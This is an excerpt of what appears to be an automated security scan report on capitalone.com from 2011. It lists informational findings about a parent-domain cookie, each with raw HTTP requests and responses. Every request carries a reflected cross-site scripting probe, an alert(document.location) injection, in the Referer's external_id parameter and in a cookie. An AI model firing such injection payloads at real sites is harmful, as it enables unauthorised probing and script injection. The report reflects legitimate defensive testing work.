P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 30933
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

var xmlHttpReq;
var zipCodeValue=null;
var regionValue=null;
var protocol= window.location.protocol + "//";

function getXmlHttpRequestObject()
{
       if (window.XMLHttpRequest)
       {
           return
...[SNIP]...

9.31. http://www.capitalone.com/js/global/portal_cof.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_cof.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_cof.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 10 Mar 2011 18:09:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 103153
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// JavaScript Document
var Cof = Cof || {};

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.

...[SNIP]...

9.32. http://www.capitalone.com/js/global/portal_footnote.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_footnote.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_footnote.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4130
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* By Dara Keo
// This relabels and reorders all disclaimers and footnotes //
*/
/*
$(document).ready(function(){
   var fnCount = 0;
   var fnHold = "*";
   var footnoteData = new Array();
   var is
...[SNIP]...

9.33. http://www.capitalone.com/js/global/portal_global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_global.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 6778
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Opens a pop-up when the function is called.
function openPopUp(url, navStatus, name, height, width){
//Opens the popup window.
var newwindow;
newwindow = window.open(url, name, 'h
...[SNIP]...

9.34. http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/LivePerson_USC_VS.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveperson/LivePerson_USC_VS.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2013
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

function lpVSLoadTrackingImage(vsTrackAction)
{
var lpVSTrackingImg = new Image();
lpVSTrackingImg.src="https://www.capitalone.com/images/https-common/tracker.gif?Log=1&pn=" + vsTrackAction;
}

...[SNIP]...

9.35. http://www.capitalone.com/js/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/mtagconfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveperson/mtagconfig.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5704
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Date last modified = 20100105
// Modified by = Hadar Blutrich

var lpMTagConfig = {
'lpServer' : 'sales.liveperson.net',
'lpNumber' : '32528459',
'lpProtocol' : (document.location.toString().inde
...[SNIP]...

9.36. http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1605
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* OnlineOpinion (F3cS,en-US) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var O_pth='/js/onl
...[SNIP]...

9.37. http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_engine.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/onlineopinionF3cS/oo_engine.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 7305
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* OnlineOpinion (F3cS,8448b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,O_t
...[SNIP]...

9.38. http://www.capitalone.com/js/questus/config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/config.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/questus/config.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 08 Sep 2010 16:09:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 3100
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

var questusSurveyConfig = {
includeUrls : {
'.*\.capitalone\.com(:80[0-9]0)?.*' : {
delay: 30000,
ratio: 1/223,
list: 10
},
'.*\.
...[SNIP]...

9.39. http://www.capitalone.com/js/questus/intercept.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/intercept.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/questus/intercept.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 08 Jul 2010 15:13:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 11914
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

function Stub() { //{{{
this.survey = "/survey/qst/qst10001";
this.rawUrl = "http://survey.questus.com/survey/qst/qst10001";
this.urlSettings = questusSurveyConfig.stealthPages;
th
...[SNIP]...

9.40. http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/global/button/action-oversized-apply-now.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/graphic_logo/global/button/action-oversized-apply-now.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 20:55:28 GMT
Accept-Ranges: bytes
Content-Length: 1110
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR..._.................PLTEY..t.!l........b..i..t.Y........m..om./.........A^!{.-..L.................Y..T..>..Zf..q. ...|.@t..........0..Z.........^....i..}..x."../o....<.....D..Cd..f..
...[SNIP]...

9.41. http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
